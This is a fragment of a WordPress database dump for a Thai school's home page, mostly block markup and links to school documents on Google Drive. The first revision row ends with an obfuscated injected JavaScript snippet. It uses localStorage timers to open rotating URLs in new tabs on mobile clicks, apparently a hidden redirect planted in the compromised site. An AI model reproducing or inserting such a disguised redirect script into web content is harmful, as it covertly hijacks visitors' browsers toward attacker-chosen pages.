_0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-30 10:15:19','2024-08-30 03:15:19','',19,'http://watprato.ssk.in.th/?p=301',0,'revision','',0),
(302,2,'2024-08-30 10:16:21','2024-08-30 03:16:21','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br>   <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br>      <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br>       <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br>     <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" 